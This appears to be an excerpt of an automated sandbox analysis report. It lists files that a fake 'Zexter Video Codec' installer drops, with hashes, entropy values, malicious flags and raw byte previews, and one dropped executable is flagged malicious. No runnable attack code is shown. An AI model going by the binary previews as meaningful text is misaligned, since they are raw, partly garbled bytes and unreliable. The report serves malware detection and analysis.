                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libwinpthread-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65181
                                                                                                    Entropy (8bit):6.085572761520829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                                    MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                                    SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                                    SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                                    SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libxml2-2.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1400653
                                                                                                    Entropy (8bit):6.518664771362139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:YiyJaaUAnPfI1FO1Fm5wukMdBdfrwQAZV2R6yeYH3bhlN77S+N+RoQ8J0fnuVj1z:4aaUAnI1FOFmZkM1i2n5h++N+RCJ0fA1
                                                                                                    MD5:1124DD59526216DF405C4514949CCB54
                                                                                                    SHA1:8226C42D98B9D3C0E83A11167963D5B38B6DDD45
                                                                                                    SHA-256:A9016D40755966C547464430D3509CC3CFE9DD5D8B53F8B694B42B0D7141E5D6
                                                                                                    SHA-512:F007FBD3FBA7E3966FAF5F9D857ADB6607A99CD6FD8FFDF14E858BE6C4A0B155A9197BAA9D1DF0A28AF733F78F8A7346357EBAA7D3BD0C3934BF815CC51A930D
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........F.........#.........B... .................q.................................y........ ...................... .......................................0..t............................ ......................8................................text...............................`.P`.data...............................@.`..rdata..Tn... ...p..................@.`@/4.......c.......d...x..............@.0@.bss..................................`..edata....... ......................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc..t....0......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\92-Beige-DarkCyan.gtkrc (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15008
                                                                                                    Entropy (8bit):5.270725103917416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:s/nUm8NYR/fiYM8LXMX5fs38Ffx4Bf0lAT9:s/nX00iY/XMXq38FxK0lq
                                                                                                    MD5:64C98ACB587FC7E4F237EADAA84A591D
                                                                                                    SHA1:B92C3D066E67FC230D56E690AE1CC21222265614
                                                                                                    SHA-256:6E8E87C68E7EFC5CCF8694042649DE3EBA01EC1DF242C22D40842AF885D1118D
                                                                                                    SHA-512:B1542C0E3D5411CD8581150FE2D81401C93686E7E43754E8BF8F78ACBEB73A041F7D9223D7DC8072C132273D1DB6EB9917ED04F9F2123C1CEA4062E59CD7F129
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "rt_base_color:#ffffff\nrt_fg_color:#101010\nrt_tooltip_fg_color:#000000\nrt_selected_bg_color:#7C99AD\nrt_selected_fg_color:#ffffff\nrt_text_c

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\92-Beige-DarkCyan.iconset (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-down-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.815385299502723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1Aqg/ml90lvGdw1CwHTQ5NsEZxKG2mpFbp:6v/lhPW/WqgmnBdw1CFNsgdLbp
                                                                                                    MD5:CE4C02BA4708A1AAB1572A9148A94B95
                                                                                                    SHA1:E90673F72B063A610E7383EB7DAFEC7F0BD35549
                                                                                                    SHA-256:6E1332235BB51B2E29B244E5056A6C82015A5FEE79DB2D3A553CD6610DC3BB04
                                                                                                    SHA-512:902C214744235E7CA936D2B16215B63500BA980C00ADFD3773D2EFA65E12FD3EB34DA4F430024BEF2F781F762E4A938778C6AD71AF6D86A9CF02EF53C41E1233
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..........H1.....8....XIu.... ..b+..E.$..(.+. ...( .4.e@x4..G..6.g...t....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-down-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.478660891705174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXbbt8i7ltydfIxDGKuQ11iEUvWK2K1:6v/lhPW/sAXkDokflSoAkpOKtMyldp
                                                                                                    MD5:88BC92E4CF3288BA93CAF398950874CD
                                                                                                    SHA1:F1B9F2C5EF5566C5BD983B5E1B3DFF17B06412F2
                                                                                                    SHA-256:258CD3545E4E4A9CF32F31FBD1AAF19869118F2B32CC8AB88C421D53F0A63D6D
                                                                                                    SHA-512:07DCA4BFC9581F425D7BAAB13E91668A0F1C832518DE7E98C0F872A305401B68B1D1C6DB56A81CF55A81E6587DD57168AF49D5676FF24C07A0BF6B0E04FADF8B
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/......Q.@..9........{..b..U.0...&HQ.5........P.W ..;......hc.3.....B.}........h..f...;l^.. *.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-down.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):6.093633689706192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VNtTlMGBSCghX2AGBIcDV6fr66Vp:6v/7uTVPTChXCBN8fJ7
                                                                                                    MD5:2DE4E41A0E31A4C0FBB2D7FC3CBC31CE
                                                                                                    SHA1:0704F540352C579647D28E5E7821D7CA7FCC6613
                                                                                                    SHA-256:FBEC4D0BC6ED3DFDADADFFD10EB9F04058DFC11E7248DD73814E7806E58795FA
                                                                                                    SHA-512:FE60C53AADB80B6B922E17B822710A6820046C07D2742694BDF3019DD025EB8ABF4366849BE789E122B7053D5B7798D1CEAA9A296C3D007C557D95CDFFEC0115
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME...../..v[....[IDAT8.c...?.50.A.o.../...hx)T.h.x....Lp..yI..?..D2......F.@....P1..[.....C ..4...m4A.G..F...=.G....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-left-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135
                                                                                                    Entropy (8bit):5.763983120472731
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llrAkxHgbcMktxY8ot4sUnG/QgjOD4l+dCKolkup:6v/lhPW/skd/Mktx+thzjOciCflkup
                                                                                                    MD5:C1E1CF920D57580A1337044D9244B41A
                                                                                                    SHA1:2713C8C06B08A204042B3BF92F6E31724E965E81
                                                                                                    SHA-256:8BFC445B29843719FB37F265F727D4E9E6F6C0814F054A6330C096022CA7995A
                                                                                                    SHA-512:87968296D3A160EEA1C3CE012300DF21CC59ED57ADE023B76E9238AE37F491B3F585663CBC4ED86A99EA1E3C4E392672E0CEA803A2641C9F05651E62240FF358
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...NIDAT8.c`...........(5D.....\......S.8....1D..#...QjP...A.....E^C3P....z.......g...7.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-left-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195
                                                                                                    Entropy (8bit):6.589496150082679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/YkNWoInpCU14phhk1NWMUGHgyU/Hljp:6v/7uSoIpCUKhhDMUrymlN
                                                                                                    MD5:3043F969482A1E805E6DCA44A6072881
                                                                                                    SHA1:B5764E5B1B26D11737D9307A70E14403E7063A4A
                                                                                                    SHA-256:10A3799ABAABF93F03FD86A23FAFC6C68EB04B5BFB86497F04505DF151E1177E
                                                                                                    SHA-512:3BEAAFABEEF07E3BB7E95DC6C761157C38B9B2B2BDB99C517C073AA137950BFE010C0BDFCC29E955B6A46D6BEED4AB4D8D8D1EF580DD23E8A6B0F471E1FEB4D3
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...?..A...E....F'.j....DG.U$......N.|.....r..k.d.,..$4P.)R..}.F/.h..)...Q..c.%.x.t.8.jc....).......,p.3.i.k...v.F...X....^...Y.........q.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-left.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):208
                                                                                                    Entropy (8bit):6.056729441397141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VINtlMv+YftbtCETdkth4EN0QIVp:6v/7uTVI6T6T4ENRI7
                                                                                                    MD5:3DBA17AB50E1923EB74BF395677EFA06
                                                                                                    SHA1:F293297F4127A788E07D365FD4AB5EB19C7383C4
                                                                                                    SHA-256:33BF303743432947AF7E5E4FCFE7A7FF453FCFBFA6ABDC24671071B7C205DA84
                                                                                                    SHA-512:618BFD415108DDB51B7A1D1003D5E40A417BA36F612EF6FBB5F627AE7FDA2388AC2F08F8BFBE5CF6F172DF26737773C902A85FD98DEFB0CD7DE94B3CFF77FAD6
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME.....,"E......]IDAT8.c...?.50.AT5....(1......../%. 9.._.!`19........,....5..a) ^..?)5....@|...F.<.F.h^..A..p..:.j=....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-right-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):5.703022629772099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8lli9uOgkBCvMibqMGuNGpNfodyfsiB1p:6v/lhPW/i9uOliMibqMGjAMkijp
                                                                                                    MD5:65B820457098F3E41079DB7B024D6911
                                                                                                    SHA1:2D35F7523C5F990B810FAD7E2DFB1E2E46DC94AB
                                                                                                    SHA-256:3CA8816EC6B9E88958D7D33C3532CE57223E5B3454D2AE329A54C964590034D6
                                                                                                    SHA-512:52FAD1A53340EE03016E6B63364EE937BBA8C1FCBC8F491011D707102100F9BFCBB62C5D0B9D3F40BF8CEF48E4E9566271019CBA10CD57C4ACFA05EF210DF4E8
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...GIDAT8.c`......./...0.....X.R...8..S.....(5..#.X...EQjP.4.x(.l...........g.*Uug....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-right-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):193
                                                                                                    Entropy (8bit):6.5470203907323725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/bkgGNdjs2jOTS3Bs077TxUVxhlup:6v/7uzkgG7Y2yU14lc
                                                                                                    MD5:8FB0652E37E5375EFBFFC85E000333EC
                                                                                                    SHA1:98DF46702AB67C5CFF30922BE409209CEA30A6B5
                                                                                                    SHA-256:90939B8E3B4A568724143D056A93CD7B5528D4841A9D11EA0A4B11C2A35A4E03
                                                                                                    SHA-512:EF67A9624AA003A77724CB90F456A84181746E585003B31AE714A2870FFB3B2F069382CD7DA464FDE6BA68C37A94AE42CCB58B80E0608D41EEF30A81260D5545
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...1..Q...Aa....R......h..~,...:..)..S.7.f...r.I...Rd...a...X..g<p...tBE3\.....&.rU^.WW..!FTF{.5....8b.>.1.o.,.O..........i......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-right.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139
                                                                                                    Entropy (8bit):5.9354638900987355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll3MOgkBQTBlH/DVgPMWwnPUmLdeAkhBsF6c4V1B/0wXjp:6v/lhPW/cOlcBZKkWoLdePhq2BcwTp
                                                                                                    MD5:5EACCA1FC3A11F7E844B3809D9CAA537
                                                                                                    SHA1:86AF79F715B3921E507068558EEDC94EAAC677C6
                                                                                                    SHA-256:57A9751B8A85FD13C3F0C9EEAEB3B905D7B8802779EFE407E13444468A15C396
                                                                                                    SHA-512:997D5D631FF90CAD01D1613A347BF2C1F9D0723AF29A5CA52494BBEF97F4FA50040B171FD371F8A8FD31DDA2933EF0752ABC3056625A9DB747BC5E24EB6F7CD2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...RIDAT8.c`...........0h)._..` f....!...P9J....@.F.....;%....@,EI`..b.J....<..a.....z...l....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-up-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.807754777184353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1AqgRtKq2HYGHgsG0z4H1iBLq/bp:6v/lhPW/WqoKq24Psjz4H1ipep
                                                                                                    MD5:BDBB9972D9B7265AD10EDB04A9C2E239
                                                                                                    SHA1:DCA1CBFD90B5C644E37DBB6748227E3EB472E0C8
                                                                                                    SHA-256:866FC4117FC8B133D84C9AC96D13A37E99EBF626CEA47F0E8B059B6641FFC7C3
                                                                                                    SHA-512:BA6059567C6EF35161BD3A82D320EFB8E16435EBFF9CA851AC724A58F45726621BCF7F380DBD2A94A29B5DD919FEF294E7440B31F2B2FACC42AAA1968144020D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..)5...#.8..y(1.....\C..8.. .[.TCX.8........b...+@.Abr.Ip....2g..F.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-up-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.427379953657502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXb0oWhAm2KWmLk8vJvP+u3tKDhqcl1:6v/lhPW/sAXkDokflFoWhAmtW6k8ZUbp
                                                                                                    MD5:830FC62D759022DDBC665F1D8D2E9164
                                                                                                    SHA1:84FBC1F8F3770905AB365D465C956756FD62E15A
                                                                                                    SHA-256:0D0ED367EC6578DD5DB6A3637A5CFBF6DDEEB1CE12953C1DF09FEF8F8BD897AA
                                                                                                    SHA-512:B948DD792BC0379AFF1DB46A8ABFE5803005E3C5C1BC2F2ED382C4D5AF09DCCA7C8F98400B46B0C5CC1100CD492A8D1C3B90A5BE9B2C5EA2537DAA7911B3458C
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/.~..h..f|.u.....4.]hc.3.....@.!v...!.+PC.k\=.A.....1...0A.*H.c..{.Qb..RTA..r.(P.@......;'...!\.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\arrow-up.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220
                                                                                                    Entropy (8bit):6.113077361175645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/CsQH4dKcDA/M+DPu45sC93H5Adp:6v/7ugHcZuK45sC9X5C
                                                                                                    MD5:0BAE3C12DFF85642E6DEBB90607258F0
                                                                                                    SHA1:2B369328373C449DA154FEEC4235464F53AC27FB
                                                                                                    SHA-256:8C41C0E27B9D85D5D49BF44F00A096FA18680E85077FFEB9EC65750F1EFAAA41
                                                                                                    SHA-512:D86BAF78EECDFB96E857D1749BB0580F6230F83D54D4F4843F94EC6335AF339D22560A00907E897A9BB427200305B83056B4649321ABE0C719DDCA89549639D0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....sBIT....|.d.....pHYs...........~.....tEXtSoftware.www.inkscape.org..<....YIDAT8.c...?.50.A.. w v.. ) .....X.\...x...X..#. . ..d./ .&. . >...\.b^R..ze1.^...M... .1.....d.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\button-insensitive.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1128
                                                                                                    Entropy (8bit):7.702657785044095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CiUpjur3mHiYuZssTwiTn7JgcOc/irhx1F613aC8BLZ2cL/Fsc:CNpj23hnNTwiTPzU6t+JI4FN
                                                                                                    MD5:3F6A543B6C75ACB2EE000A3BAC7B9A59
                                                                                                    SHA1:A53275A9B4F65393301A1C787B67E87FFDA8234F
                                                                                                    SHA-256:3FACB849498CFA7CCF96BF7B02C5792C0DC49374EA7DDDC8F78E7ED53A96C72B
                                                                                                    SHA-512:E9E98AFF394E4ADAEA3C79096BD8DC865EF539D67F9E3030FEB7F4FACAACC1278606592228A19733AF99128966530CEC1363E9C6DAB6C555DFC0D8C7ADB51517
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDATX..=SSA...........G.+F....._daaaa..a.....JG+.... 7$ww=g.ws..A/n.~.>.y..+}......=%.Tn..m.....Bt.....N..'.....Z.'...........;....[.d.....~.....9.LI.?>W.........It.W..m...N...x&8>.....}....0....JoU,<X$G..m..YV......w..L...:n..FJ..!......."|.......C)........)p...)F....[.Y..{..jZ@.j.s5xv.W.|L&./.^.u..y....h..4.9b..}$..q.....".....{..p..9;.s..Ul.............^......p...d+.....u......tZ...B......d..Z.....q.....'H.}...g.jl....~a.ng...m.....mw.fp..0....,MI..v.W..7........l8.s.K..*.2....qB..|:.\[...Nje...!..L.^q.Z.hU..f..35s..hK.......R.. $.-..:.......7.p6N.i.+.....u..!RE8..L&...U+...s.x.O.s.H.U.R.E..>z.".......".DB.....9F.......h...W.<.....KH.DO.}.q.!.*....<8.c.J...A.|.S..}.d..ZL......vh....<.#.......W.i..+...m....p...8..Q......A....7..f.sk=.....!.%........tY...S.+...t.Y....1.97P!..a....a.%.m9[~I..K.?..tB.v.L&.[-.h...D...J'......Q'4...59.......I.s..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\button-normal.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1497
                                                                                                    Entropy (8bit):7.768741056434717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqyoicsCo1Rd3ASFaaFX4FumgLpc8ut4qzrtpei0AF3BkNmhqCTEOU:eznTR3YaFXSiut4qzrtbeNmhTE7
                                                                                                    MD5:F860FF3693F12371577E33808AEA17E7
                                                                                                    SHA1:10EA223E855685506460EA8C3FC9427350CAA1E2
                                                                                                    SHA-256:B8714DCC43D031A602E3C560EBB1A07C1A892AB84E34F06EDEB03B59FEB09BD6
                                                                                                    SHA-512:6A6307796F6C6D5FEC3A0B4168DCAD5E6B15008D5CC247B562ECE25E25B87AC40ECB372038E351674FC75AB391CA23E47B8DF1966D2849DC3DD0ADFFB7CEFA62
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......3...g...YIDATX.W.N#G.....`.......6........O&.b..@......`....J..)... ...0..Q9..n..1.LK.vwW.s...q. .x.........~.+..V...C..G.....4M.,.B.^.......w...1.}.33X....z....[,Jfgg........Z.R..'..y18@I.G....www...u...6ZYY.....w,KH.....nnn.....[\\lLLL.7..z.........$.,.3~||.......uOOO....{.........................1..XkC...}...D..M`.n..i...6dvNNN.9::........j..[.sssMX.I.........~B...`.(.....n...^]]].......hdd.k...o...rp~Lp.....%..*G.$.k4..\...6..:..._X...Yz.J0..`ll..).R..(...s... C.....J...0+x6m.A.J...X90L..~.i.H.(..?....`....|...}.......*d.>...v G.9....AR.W...H.$......H.i..?.)..<..)..Ps..<.x.....Lc........E}.,.30.5.p.........$.Et....\E...!.Fd...e......5.Q..s.I.B&.}..#.@..j.E..d..... `h=QL[..2..+..M.C.....k.s.i.I.3..+r.Z]..G|$..U..!..........{..J...T....K..e..1.e..[EY+.(T.T.<!.Y.I.....O.x.\L..^c..FHH.S........F4.f.{....S.....*eS. ..4....(...eQ.|9.....!.R4.X.+.<..!..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\button-normal.xcf (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:GIMP XCF image data, version 0, 32 x 32, RGB Color
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3977
                                                                                                    Entropy (8bit):5.413488066014333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7dsNCv/C/CVGhkFTKfyeeocjI4Dc8oPjZ/narUX0Zwnc1ZHHdOkdsFVpAa:KcQ2Gyejc0QoPjZ/KKgwniLsFVpAa
                                                                                                    MD5:1339E8669A986ACB3CCA794EF7E67ABB
                                                                                                    SHA1:8295D74B144481F86B928D0C9A2F16AE0FF86F7C
                                                                                                    SHA-256:4D58C67A4095BE33201E16C2545B28DEF1CBA2D7690F0540877866CFC7ACE230
                                                                                                    SHA-512:DF9AA421947EF90713D0F9D2648803DDC975DB7FDB67F2941A9CA7FD489C9734081FE085C4ED4335C798A05CE2028D84C22A4948C558FDCBE86593CFEBB6A796
                                                                                                    Malicious:false
                                                                                                    Preview:gimp xcf file.... ... .....................B...B..............?........................gimp-image-grid.........(style solid).(fgcolor (color-rgba 0.000000 0.000000 0.000000 1.000000)).(bgcolor (color-rgba 1.000000 1.000000 1.000000 1.000000)).(xspacing 10.000000).(yspacing 10.000000).(spacing-unit inches).(xoffset 0.000000).(yoffset 0.000000).(offset-unit inches).................................5........... ... ........New Layer............l...............................................................................................................+...........=....... ... .......Q....... ... ...a....E...............................#.E...............................#.E...............................#.E.............Vq.q.W......?......?......8......8..............#.... ... ........New Layer#4............................................................................................................................'................... ... ............... ... .........................."..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\button-prelight.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1442
                                                                                                    Entropy (8bit):7.754161124979248
                                                                                                    Encrypted:false
